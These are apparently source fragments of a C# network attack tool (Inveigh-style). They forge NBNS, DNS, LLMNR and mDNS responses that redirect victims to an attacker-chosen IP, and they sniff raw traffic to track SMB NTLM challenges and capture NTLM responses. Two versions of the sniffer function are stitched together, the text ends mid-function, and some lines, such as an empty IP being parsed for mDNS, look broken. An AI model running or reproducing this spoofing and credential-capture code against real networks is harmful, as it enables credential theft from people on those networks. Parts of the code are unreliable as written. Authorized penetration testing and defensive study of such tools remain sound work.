public static byte[] GetNBNSResponse(string type, string nbnsTTL, byte[] spooferIPData, byte[] udpSourcePort, byte[] udpPayload) { Array.Reverse(udpSourcePort); byte[] ttlNBNS = BitConverter.GetBytes(Int32.Parse(nbnsTTL)); Array.Reverse(ttlNBNS); byte[] nbnsTransactionID = new byte[2]; System.Buffer.BlockCopy(udpPayload, 0, nbnsTransactionID, 0, 2); byte[] nbnsRequestType = new byte[2]; System.Buffer.BlockCopy(udpPayload, 43, nbnsRequestType, 0, 2); string nbnsQueryType = NBNS.NBNSQueryType(nbnsRequestType); byte[] nbnsType = new byte[1]; System.Buffer.BlockCopy(udpPayload, 47, nbnsType, 0, 1); byte[] nbnsRequest = new byte[udpPayload.Length - 20]; System.Buffer.BlockCopy(udpPayload, 13, nbnsRequest, 0, nbnsRequest.Length); string nbnsRequestHost = NBNS.BytesToNBNSQuery(nbnsRequest); MemoryStream nbnsMemoryStream = new MemoryStream(); if (String.Equals(type, "sniffer")) { nbnsMemoryStream.Write((new byte[2] { 0x00, 0x89 }), 0, 2); nbnsMemoryStream.Write(udpSourcePort, 0, 2); nbnsMemoryStream.Write((new byte[2] { 0x00, 0x00 }), 0, 2); nbnsMemoryStream.Write((new byte[2] { 0x00, 0x00 }), 0, 2); } nbnsMemoryStream.Write(nbnsTransactionID, 0, nbnsTransactionID.Length); nbnsMemoryStream.Write((new byte[11] { 0x85, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20 }), 0, 11); nbnsMemoryStream.Write(nbnsRequest, 0, nbnsRequest.Length); nbnsMemoryStream.Write(nbnsRequestType, 0, 2); nbnsMemoryStream.Write((new byte[5] { 0x00, 0x00, 0x20, 0x00, 0x01 }), 0, 5); nbnsMemoryStream.Write(ttlNBNS, 0, 4); nbnsMemoryStream.Write((new byte[4] { 0x00, 0x06, 0x00, 0x00 }), 0, 4); nbnsMemoryStream.Write(spooferIPData, 0, spooferIPData.Length); if (String.Equals(type, "sniffer")) { nbnsMemoryStream.Position = 4; nbnsMemoryStream.Write(Util.IntToByteArray2((int)nbnsMemoryStream.Length), 0, 2); } return(nbnsMemoryStream.ToArray()); }
public static void NBNSListener(string IP, string spooferIP, string nbnsTTL, string[] nbnsTypes) { byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes(); byte[] ttlNBNS = BitConverter.GetBytes(Int32.Parse(nbnsTTL)); Array.Reverse(ttlNBNS); IPEndPoint nbnsEndpoint = new IPEndPoint(IPAddress.Broadcast, 137); UdpClient nbnsClient = UDP.UDPListener("NBNS", IPAddress.Any.ToString(), 137, "IPv4"); while (!Program.exitInveigh) { try { byte[] udpPayload = nbnsClient.Receive(ref nbnsEndpoint); byte[] nbnsQuestionsAnswerRRs = new byte[4]; System.Buffer.BlockCopy(udpPayload, 4, nbnsQuestionsAnswerRRs, 0, 4); byte[] nbnsAdditionalRRs = new byte[2]; System.Buffer.BlockCopy(udpPayload, 10, nbnsAdditionalRRs, 0, 2); if (String.Equals(BitConverter.ToString(nbnsQuestionsAnswerRRs), "00-01-00-00") && !String.Equals(BitConverter.ToString(nbnsAdditionalRRs), "00-01")) { string nbnsResponseMessage = ""; byte[] nbnsTransactionID = new byte[2]; System.Buffer.BlockCopy(udpPayload, 0, nbnsTransactionID, 0, 2); byte[] nbnsRequestType = new byte[2]; System.Buffer.BlockCopy(udpPayload, 43, nbnsRequestType, 0, 2); string nbnsQueryType = NBNSQueryType(nbnsRequestType); byte[] nbnsType = new byte[1]; System.Buffer.BlockCopy(udpPayload, 47, nbnsType, 0, 1); byte[] nbnsRequest = new byte[udpPayload.Length - 20]; System.Buffer.BlockCopy(udpPayload, 13, nbnsRequest, 0, nbnsRequest.Length); string nbnsRequestHost = BytesToNBNSQuery(nbnsRequest); IPAddress sourceIPAddress = nbnsEndpoint.Address; nbnsResponseMessage = Util.CheckRequest(nbnsRequestHost, sourceIPAddress.ToString(), IP.ToString(), "NBNS", nbnsQueryType, nbnsTypes); if (Program.enabledNBNS && String.Equals(nbnsResponseMessage, "response sent")) { if (Array.Exists(nbnsTypes, element => element == nbnsQueryType) && !String.Equals(BitConverter.ToString(nbnsType), "21")) { byte[] nbnsResponse = NBNS.GetNBNSResponse("listener", nbnsTTL, spooferIPData, Util.IntToByteArray2(137), udpPayload); UDP.UDPListenerClient(sourceIPAddress, 137, nbnsClient, nbnsResponse); nbnsClient = UDP.UDPListener("NBNS", IPAddress.Any.ToString(), 137, "IPv4"); } else if (String.Equals(BitConverter.ToString(nbnsType), "21")) { nbnsResponseMessage = "NBSTAT request"; } else { nbnsResponseMessage = "NBNS type disabled"; } } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] NBNS request for {1}<{2}> from {3} [{4}]", DateTime.Now.ToString("s"), nbnsRequestHost, nbnsQueryType, sourceIPAddress, nbnsResponseMessage)); } } } catch (Exception ex) { Program.outputList.Add(String.Format("[-] [{0}] NBNS spoofer error detected - {1}", DateTime.Now.ToString("s"), ex.ToString())); } } }
public static void SnifferSpoofer(string snifferIP, string spooferIP, string dnsTTL, string llmnrTTL, string mdnsTTL, string nbnsTTL, string[] mdnsTypes, string[] nbnsTypes, string[] pcapTCP, string[] pcapUDP) { byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes(); byte[] byteIn = new byte[4] { 1, 0, 0, 0 }; byte[] byteOut = new byte[4] { 1, 0, 0, 0 }; byte[] byteData = new byte[65534]; Socket snifferSocket; try { snifferSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP); snifferSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true); snifferSocket.ReceiveBufferSize = 65534; IPEndPoint snifferEndPoint = new IPEndPoint(IPAddress.Parse(snifferIP), 0); snifferSocket.Bind(snifferEndPoint); snifferSocket.IOControl(IOControlCode.ReceiveAll, byteIn, byteOut); } catch { lock (Program.outputList) { Program.outputList.Add(String.Format("[-] Error starting packet sniffer, check if shell has elevated privilege or set -Elevated N for unprivileged mode.", DateTime.Now.ToString("s"))); } throw; } int packetLength; string outputPcap = ""; if (Program.enabledPcap) { byte[] pcapHeader = new byte[24] { 0xd4, 0xc3, 0xb2, 0xa1, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 }; outputPcap = Path.Combine(Program.argFileOutputDirectory, String.Concat(Program.argFilePrefix, "-Packets.pcap")); bool existsPcapFile = File.Exists(outputPcap); pcapFile = new FileStream(outputPcap, FileMode.Append, FileAccess.Write); if (!existsPcapFile) { pcapFile.Write(pcapHeader, 0, pcapHeader.Length); } } while (!Program.exitInveigh) { try { try { packetLength = snifferSocket.Receive(byteData, 0, byteData.Length, SocketFlags.None); } catch { packetLength = 0; } if (packetLength > 0) { MemoryStream memoryStream = new MemoryStream(byteData, 0, packetLength); BinaryReader binaryReader = new BinaryReader(memoryStream); byte versionHL = binaryReader.ReadByte(); binaryReader.ReadByte(); uint totalLength = Util.DataToUInt16(binaryReader.ReadBytes(2)); //this is 0 with tcp offload binaryReader.ReadBytes(5); byte protocolNumber = binaryReader.ReadByte(); binaryReader.ReadBytes(2); byte[] sourceIP = binaryReader.ReadBytes(4); IPAddress sourceIPAddress = new IPAddress(sourceIP); byte[] destinationIP = binaryReader.ReadBytes(4); IPAddress destinationIPAddress = new IPAddress(destinationIP); byte headerLength = versionHL; headerLength <<= 4; headerLength >>= 4; headerLength *= 4; switch (protocolNumber) { case 6: uint tcpSourcePort = Util.DataToUInt16(binaryReader.ReadBytes(2)); uint tcpDestinationPort = Util.DataToUInt16(binaryReader.ReadBytes(2)); binaryReader.ReadBytes(8); byte tcpHeaderLength = binaryReader.ReadByte(); tcpHeaderLength >>= 4; tcpHeaderLength *= 4; byte tcpFlags = binaryReader.ReadByte(); binaryReader.ReadBytes(7); int tcpPayloadLength = packetLength - (int)headerLength - (int)tcpHeaderLength; byte[] payloadBytes = binaryReader.ReadBytes(tcpPayloadLength); string challenge = ""; string session = ""; string tcpSession = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort); string tcpFlagsBinary = Convert.ToString(tcpFlags, 2); tcpFlagsBinary = tcpFlagsBinary.PadLeft(8, '0'); if (String.Equals(tcpFlagsBinary.Substring(6, 1), "1") && String.Equals(tcpFlagsBinary.Substring(3, 1), "0") && destinationIPAddress.ToString() == snifferIP) { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] TCP({1}) SYN packet received from {2}", DateTime.Now.ToString("s"), tcpDestinationPort, tcpSession)); } } switch (tcpDestinationPort) { case 139: if (payloadBytes.Length > 0) { SMBConnection(payloadBytes, snifferIP, sourceIPAddress.ToString(), destinationIPAddress.ToString(), Convert.ToString(tcpSourcePort), "139"); } session = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort); if (Program.smbSessionTable.ContainsKey(session)) { NTLM.GetNTLMResponse(payloadBytes, sourceIPAddress.ToString(), Convert.ToString(tcpSourcePort), "SMB", "139"); } break; case 445: if (payloadBytes.Length > 0) { SMBConnection(payloadBytes, snifferIP, sourceIPAddress.ToString(), destinationIPAddress.ToString(), Convert.ToString(tcpSourcePort), "445"); } session = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort); if (Program.smbSessionTable.ContainsKey(session)) { NTLM.GetNTLMResponse(payloadBytes, sourceIPAddress.ToString(), Convert.ToString(tcpSourcePort), "SMB", "445"); } break; } switch (tcpSourcePort) { case 139: if (payloadBytes.Length > 0) { challenge = NTLM.GetSMBNTLMChallenge(payloadBytes); } session = destinationIPAddress.ToString() + ":" + Convert.ToString(tcpDestinationPort); if (!string.IsNullOrEmpty(challenge) && destinationIP != sourceIP) { if (!String.Equals(destinationIP, snifferIP)) { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} sent to {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session)); } } else { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} received from {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session)); } } Program.smbSessionTable[session] = challenge; } break; case 445: if (payloadBytes.Length > 0) { challenge = NTLM.GetSMBNTLMChallenge(payloadBytes); } session = destinationIPAddress.ToString() + ":" + Convert.ToString(tcpDestinationPort); if (!string.IsNullOrEmpty(challenge) && destinationIP != sourceIP) { if (!String.Equals(destinationIP, snifferIP)) { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} sent to {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session)); } } else { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} received from {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session)); } } Program.smbSessionTable[session] = challenge; } break; } if (Program.enabledPcap && (pcapTCP != null && pcapTCP.Length > 0 && (Array.Exists(pcapTCP, element => element == tcpSourcePort.ToString()) || Array.Exists(pcapTCP, element => element == tcpDestinationPort.ToString()) || Array.Exists(pcapTCP, element => element == "ALL")))) { PcapOutput((uint)packetLength, byteData); } break; case 17: byte[] udpSourcePort = binaryReader.ReadBytes(2); uint endpointSourcePort = Util.DataToUInt16(udpSourcePort); uint udpDestinationPort = Util.DataToUInt16(binaryReader.ReadBytes(2)); uint udpLength = Util.DataToUInt16(binaryReader.ReadBytes(2)); binaryReader.ReadBytes(2); byte[] udpPayload; try { udpPayload = binaryReader.ReadBytes(((int)udpLength - 2) * 4); } catch { udpPayload = new byte[2]; } switch (udpDestinationPort) { case 53: string dnsResponseMessage = ""; Array.Reverse(udpSourcePort); byte[] ttlDNS = BitConverter.GetBytes(Int32.Parse(dnsTTL)); Array.Reverse(ttlDNS); byte[] dnsTransactionID = new byte[2]; System.Buffer.BlockCopy(udpPayload, 0, dnsTransactionID, 0, 2); string dnsRequestHost = Util.ParseNameQuery(12, udpPayload); byte[] dnsRequest = new byte[dnsRequestHost.Length + 2]; System.Buffer.BlockCopy(udpPayload, 12, dnsRequest, 0, dnsRequest.Length); int udpResponseLength = dnsRequest.Length + dnsRequest.Length + spooferIP.Length + 27; string[] dnsRequestSplit = dnsRequestHost.Split('.'); if (dnsRequestSplit != null && dnsRequestSplit.Length > 0) { dnsResponseMessage = Util.CheckRequest(dnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "DNS"); } if (Program.enabledDNS && String.Equals(dnsResponseMessage, "response sent")) { using (MemoryStream ms = new MemoryStream()) { ms.Write((new byte[2] { 0x00, 0x35 }), 0, 2); ms.Write(udpSourcePort, 0, 2); ms.Write(Util.IntToByteArray2(udpResponseLength), 0, 2); ms.Write((new byte[2] { 0x00, 0x00 }), 0, 2); ms.Write(dnsTransactionID, 0, dnsTransactionID.Length); ms.Write((new byte[10] { 0x80, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00 }), 0, 10); ms.Write(dnsRequest, 0, dnsRequest.Length); ms.Write((new byte[4] { 0x00, 0x01, 0x00, 0x01 }), 0, 4); ms.Write(dnsRequest, 0, dnsRequest.Length); ms.Write((new byte[4] { 0x00, 0x01, 0x00, 0x01 }), 0, 4); ms.Write(ttlDNS, 0, 4); ms.Write((new byte[2] { 0x00, 0x04 }), 0, 2); ms.Write(spooferIPData, 0, spooferIPData.Length); Socket dnsSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp); dnsSendSocket.SendBufferSize = 1024; IPEndPoint dnsEndPoint = new IPEndPoint(sourceIPAddress, (int)endpointSourcePort); dnsSendSocket.SendTo(ms.ToArray(), dnsEndPoint); dnsSendSocket.Close(); } } if (String.Equals(destinationIPAddress.ToString(), snifferIP.ToString())) { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] DNS request for {1} received from {2} [{3}]", DateTime.Now.ToString("s"), dnsRequestHost, sourceIPAddress, dnsResponseMessage)); } } else { lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] DNS request for {1} sent to {2} [{3}]", DateTime.Now.ToString("s"), dnsRequestHost, destinationIPAddress, "outgoing query")); } } break; case 137: byte[] nbnsQuestionsAnswerRRs = new byte[4]; System.Buffer.BlockCopy(udpPayload, 4, nbnsQuestionsAnswerRRs, 0, 4); byte[] nbnsAdditionalRRs = new byte[2]; System.Buffer.BlockCopy(udpPayload, 10, nbnsAdditionalRRs, 0, 2); if (BitConverter.ToString(nbnsQuestionsAnswerRRs) == "00-01-00-00" && BitConverter.ToString(nbnsAdditionalRRs) != "00-01") { string nbnsResponseMessage = ""; udpLength += 12; byte[] ttlNBNS = BitConverter.GetBytes(Int32.Parse(nbnsTTL)); Array.Reverse(ttlNBNS); byte[] nbnsTransactionID = new byte[2]; System.Buffer.BlockCopy(udpPayload, 0, nbnsTransactionID, 0, 2); byte[] nbnsRequestType = new byte[2]; System.Buffer.BlockCopy(udpPayload, 43, nbnsRequestType, 0, 2); string nbnsQueryType = NBNS.NBNSQueryType(nbnsRequestType); byte[] nbnsRequest = new byte[udpPayload.Length - 20]; System.Buffer.BlockCopy(udpPayload, 13, nbnsRequest, 0, nbnsRequest.Length); string nbnsRequestHost = NBNS.BytesToNBNSQuery(nbnsRequest); nbnsResponseMessage = Util.CheckRequest(nbnsRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), "NBNS"); if (Program.enabledNBNS && String.Equals(nbnsResponseMessage, "response sent")) { if (Array.Exists(nbnsTypes, element => element == nbnsQueryType)) { using (MemoryStream ms = new MemoryStream()) { ms.Write((new byte[2] { 0x00, 0x89 }), 0, 2); ms.Write((new byte[2] { 0x00, 0x89 }), 0, 2); ms.Write(Util.IntToByteArray2((int)udpLength), 0, 2); ms.Write((new byte[2] { 0x00, 0x00 }), 0, 2); ms.Write(nbnsTransactionID, 0, nbnsTransactionID.Length); ms.Write((new byte[11] { 0x85, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20 }), 0, 11); ms.Write(nbnsRequest, 0, nbnsRequest.Length); ms.Write(nbnsRequestType, 0, 2); ms.Write((new byte[5] { 0x00, 0x00, 0x20, 0x00, 0x01 }), 0, 5); ms.Write(ttlNBNS, 0, 4); ms.Write((new byte[4] { 0x00, 0x06, 0x00, 0x00 }), 0, 4); ms.Write(spooferIPData, 0, spooferIPData.Length); Socket nbnsSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp); nbnsSendSocket.SendBufferSize = 1024; IPEndPoint nbnsEndPoint = new IPEndPoint(sourceIPAddress, 137); nbnsSendSocket.SendTo(ms.ToArray(), nbnsEndPoint); nbnsSendSocket.Close(); } } else { nbnsResponseMessage = "NBNS type disabled"; } } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] NBNS request for {1}<{2}> received from {3} [{4}]", DateTime.Now.ToString("s"), nbnsRequestHost, nbnsQueryType, sourceIPAddress, nbnsResponseMessage)); } } break; case 5353: string mdnsResponseMessage = ""; byte[] mdnsType = new byte[2]; if (BitConverter.ToString(udpPayload).EndsWith("-00-01-80-01") && String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00")) { udpLength += 10; byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL)); Array.Reverse(ttlMDNS); byte[] mdnsTransactionID = new byte[2]; string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload); System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2); byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2]; System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length); string[] mdnsRequestSplit = mdnsRequestHostFull.Split('.'); if (mdnsRequestSplit != null && mdnsRequestSplit.Length > 0) { mdnsResponseMessage = Util.CheckRequest(mdnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "MDNS"); } if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent")) { if (Array.Exists(mdnsTypes, element => element == "QU")) { using (MemoryStream ms = new MemoryStream()) { ms.Write((new byte[2] { 0x14, 0xe9 }), 0, 2); ms.Write((new byte[2] { 0x14, 0xe9 }), 0, 2); ms.Write(Util.IntToByteArray2((int)udpLength), 0, 2); ms.Write((new byte[2] { 0x00, 0x00 }), 0, 2); ms.Write(mdnsTransactionID, 0, mdnsTransactionID.Length); ms.Write((new byte[10] { 0x84, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00 }), 0, 10); ms.Write(mdnsRequest, 0, mdnsRequest.Length); ms.Write((new byte[4] { 0x00, 0x01, 0x80, 0x01 }), 0, 4); ms.Write(ttlMDNS, 0, 4); ms.Write((new byte[2] { 0x00, 0x04 }), 0, 2); ms.Write(spooferIPData, 0, spooferIPData.Length); Socket mdnsSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp); mdnsSendSocket.SendBufferSize = 1024; IPEndPoint mdnsEndPoint = new IPEndPoint(IPAddress.Parse(""), 5353); mdnsSendSocket.SendTo(ms.ToArray(), mdnsEndPoint); mdnsSendSocket.Close(); } } else { mdnsResponseMessage = "mDNS type disabled"; } } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] mDNS(QU) request for {1} received from {2} [{3}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, sourceIPAddress, mdnsResponseMessage)); } } else if (BitConverter.ToString(udpPayload).EndsWith("-00-01") && (String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00") || String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-02-00-00-00-00-00-00"))) { udpLength += 4; byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL)); Array.Reverse(ttlMDNS); byte[] mdnsTransactionID = new byte[2]; System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2); string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload); byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2]; System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length); string[] mdnsRequestSplit = mdnsRequestHostFull.Split('.'); if (mdnsRequestSplit != null && mdnsRequestSplit.Length > 0) { mdnsResponseMessage = Util.CheckRequest(mdnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "MDNS"); } if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent")) { if (Array.Exists(mdnsTypes, element => element == "QM")) { using (MemoryStream ms = new MemoryStream()) { ms.Write((new byte[2] { 0x14, 0xe9 }), 0, 2); ms.Write((new byte[2] { 0x14, 0xe9 }), 0, 2); ms.Write(Util.IntToByteArray2((int)udpLength), 0, 2); ms.Write((new byte[2] { 0x00, 0x00 }), 0, 2); ms.Write(mdnsTransactionID, 0, mdnsTransactionID.Length); ms.Write((new byte[10] { 0x84, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00 }), 0, 10); ms.Write(mdnsRequest, 0, mdnsRequest.Length); ms.Write((new byte[4] { 0x00, 0x01, 0x80, 0x01 }), 0, 4); ms.Write(ttlMDNS, 0, 4); ms.Write((new byte[2] { 0x00, 0x04 }), 0, 2); ms.Write(spooferIPData, 0, spooferIPData.Length); Socket mdnsSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp); mdnsSendSocket.SendBufferSize = 1024; IPEndPoint mdnsEndPoint = new IPEndPoint(IPAddress.Parse(""), 5353); mdnsSendSocket.SendTo(ms.ToArray(), mdnsEndPoint); mdnsSendSocket.Close(); } } else { mdnsResponseMessage = "mDNS type disabled"; } } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] mDNS(QM) request for {1} received from {2} [{3}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, sourceIPAddress, mdnsResponseMessage)); } } break; case 5355: string llmnrResponseMessage = ""; byte[] ttlLLMNR = BitConverter.GetBytes(Int32.Parse(llmnrTTL)); Array.Reverse(ttlLLMNR); byte[] llmnrType = new byte[2]; System.Buffer.BlockCopy(udpPayload, (udpPayload.Length - 4), llmnrType, 0, 2); if (BitConverter.ToString(llmnrType) != "00-1C") { udpLength += (byte)(udpPayload.Length - 2); Array.Reverse(udpSourcePort); byte[] llmnrTransactionID = new byte[2]; System.Buffer.BlockCopy(udpPayload, 0, llmnrTransactionID, 0, 2); byte[] llmnrRequest = new byte[udpPayload.Length - 18]; byte[] llmnrRequestLength = new byte[1]; System.Buffer.BlockCopy(udpPayload, 12, llmnrRequestLength, 0, 1); System.Buffer.BlockCopy(udpPayload, 13, llmnrRequest, 0, llmnrRequest.Length); string llmnrRequestHost = System.Text.Encoding.UTF8.GetString(llmnrRequest); llmnrResponseMessage = Util.CheckRequest(llmnrRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), "LLMNR"); if (Program.enabledLLMNR && String.Equals(llmnrResponseMessage, "response sent")) { using (MemoryStream ms = new MemoryStream()) { ms.Write((new byte[2] { 0x14, 0xeb }), 0, 2); ms.Write(udpSourcePort, 0, 2); ms.Write(Util.IntToByteArray2((int)udpLength), 0, 2); ms.Write((new byte[2] { 0x00, 0x00 }), 0, 2); ms.Write(llmnrTransactionID, 0, llmnrTransactionID.Length); ms.Write((new byte[10] { 0x80, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00 }), 0, 10); ms.Write(llmnrRequestLength, 0, 1); ms.Write(llmnrRequest, 0, llmnrRequest.Length); ms.Write((new byte[5] { 0x00, 0x00, 0x01, 0x00, 0x01 }), 0, 5); ms.Write(llmnrRequestLength, 0, 1); ms.Write(llmnrRequest, 0, llmnrRequest.Length); ms.Write((new byte[5] { 0x00, 0x00, 0x01, 0x00, 0x01 }), 0, 5); ms.Write(ttlLLMNR, 0, 4); ms.Write((new byte[2] { 0x00, 0x04 }), 0, 2); ms.Write(spooferIPData, 0, spooferIPData.Length); Socket llmnrSendSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Udp); llmnrSendSocket.SendBufferSize = 1024; IPEndPoint llmnrEndPoint = new IPEndPoint(sourceIPAddress, (int)endpointSourcePort); llmnrSendSocket.SendTo(ms.ToArray(), llmnrEndPoint); llmnrSendSocket.Close(); } } lock (Program.outputList) { Program.outputList.Add(String.Format("[+] [{0}] LLMNR request for {1} received from {2} [{3}]", DateTime.Now.ToString("s"), llmnrRequestHost, sourceIPAddress, llmnrResponseMessage)); } } break; } if (Program.enabledPcap && (pcapUDP != null && pcapUDP.Length > 0 && (Array.Exists(pcapUDP, element => element == udpSourcePort.ToString()) || Array.Exists(pcapUDP, element => element == udpDestinationPort.ToString()) || Array.Exists(pcapUDP, element => element == "ALL")))) { PcapOutput((uint)packetLength, byteData); } break; } } } catch (Exception ex) { Program.outputList.Add(String.Format("[-] [{0}] Packet sniffing error detected - {1}", DateTime.Now.ToString("s"), ex.ToString())); } } }
public static void SnifferSpoofer(string ipVersion, string snifferIP, string snifferMAC, string spooferIP, string spooferIPv6, string dnsDomainController, string dnsTTL, string llmnrTTL, string mdnsTTL, string nbnsTTL, string[] dnsTypes, string[] mdnsQuestions, string[] mdnsTypes, string[] nbnsTypes, string dhcpv6DomainSuffix, string[] pcapTCP, string[] pcapUDP) { byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes(); byte[] spooferIPv6Data = IPAddress.Parse(spooferIPv6).GetAddressBytes(); byte[] byteIn = new byte[4] { 1, 0, 0, 0 }; byte[] byteOut = new byte[4] { 1, 0, 0, 0 }; byte[] byteData = new byte[65534]; Socket snifferSocket; IPEndPoint snifferEndPoint; EndPoint snifferEndPointRemote; IPAddress destinationIPAddress = IPAddress.Parse(snifferIP); int i = 0; int dhcpv6IPIndex = 1; Random ipv6Random = new Random(); int ipv6RandomValue = ipv6Random.Next(1, 9999); byte[] snifferMACArray = new byte[6]; byte[] dhcpv6DomainSuffixData = Util.NewDNSNameArray(dhcpv6DomainSuffix, true); var ipVersionAddressFamily = AddressFamily.InterNetwork; if (String.Equals(ipVersion, "IPv6")) { snifferEndPointRemote = new IPEndPoint(IPAddress.IPv6Any, 0); ipVersionAddressFamily = AddressFamily.InterNetworkV6; snifferMAC = snifferMAC.Insert(2, "-").Insert(5, "-").Insert(8, "-").Insert(11, "-").Insert(14, "-"); foreach (string character in snifferMAC.Split('-')) { snifferMACArray[i] = Convert.ToByte(Convert.ToInt16(character, 16)); i++; } } else { snifferEndPointRemote = new IPEndPoint(IPAddress.Any, 0); } try { if (String.Equals(ipVersion, "IPv4")) { snifferSocket = new Socket(ipVersionAddressFamily, SocketType.Raw, ProtocolType.IP); } else { snifferSocket = new Socket(ipVersionAddressFamily, SocketType.Raw, ProtocolType.Udp); } snifferEndPoint = new IPEndPoint(IPAddress.Parse(snifferIP), 0); snifferSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true); snifferSocket.ReceiveBufferSize = 65534; snifferSocket.Bind(snifferEndPoint); snifferSocket.IOControl(IOControlCode.ReceiveAll, byteIn, byteOut); } catch { lock (Program.outputList) { Program.outputList.Add(String.Format("[-] Error starting packet sniffer, check if shell has elevated privilege or set -Elevated N for unprivileged mode.", DateTime.Now.ToString("s"))); } throw; } int packetLength; string outputPcap = ""; if (Program.enabledPcap) { byte[] pcapHeader = new byte[24] { 0xd4, 0xc3, 0xb2, 0xa1, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 }; outputPcap = Path.Combine(Program.argFileOutputDirectory, String.Concat(Program.argFilePrefix, "-Packets.pcap")); bool existsPcapFile = File.Exists(outputPcap); pcapFile = new FileStream(outputPcap, FileMode.Append, FileAccess.Write); if (!existsPcapFile) { pcapFile.Write(pcapHeader, 0, pcapHeader.Length); } } while (!Program.exitInveigh) { try { try { packetLength = snifferSocket.ReceiveFrom(byteData, 0, byteData.Length, SocketFlags.None, ref snifferEndPointRemote); } catch { packetLength = 0; } if (packetLength > 0) { MemoryStream memoryStream = new MemoryStream(byteData, 0, packetLength); BinaryReader binaryReader = new BinaryReader(memoryStream); IPAddress sourceIPAddress; int protocolNumber; byte[] sourceIP = new byte[4]; byte[] destinationIP = new byte[4]; if (String.Equals(ipVersion, "IPv4")) { byte versionHL = binaryReader.ReadByte(); binaryReader.ReadByte(); uint totalLength = Util.DataToUInt16(binaryReader.ReadBytes(2)); //this is 0 with tcp offload binaryReader.ReadBytes(5); protocolNumber = (int)binaryReader.ReadByte(); binaryReader.ReadBytes(2); sourceIP = binaryReader.ReadBytes(4); sourceIPAddress = new IPAddress(sourceIP); destinationIP = binaryReader.ReadBytes(4); destinationIPAddress = new IPAddress(destinationIP); byte headerLength = versionHL; headerLength <<= 4; headerLength >>= 4; headerLength *= 4; } else { sourceIPAddress = IPAddress.Parse(snifferEndPointRemote.ToString().Substring(0, snifferEndPointRemote.ToString().Length - 2)); protocolNumber = (int)snifferSocket.ProtocolType; } switch (protocolNumber) { case 6: uint tcpSourcePort = Util.DataToUInt16(binaryReader.ReadBytes(2)); uint tcpDestinationPort = Util.DataToUInt16(binaryReader.ReadBytes(2)); binaryReader.ReadBytes(8); byte tcpHeaderLength = binaryReader.ReadByte(); tcpHeaderLength >>= 4; tcpHeaderLength *= 4; byte tcpFlags = binaryReader.ReadByte(); binaryReader.ReadBytes(tcpHeaderLength - 15); 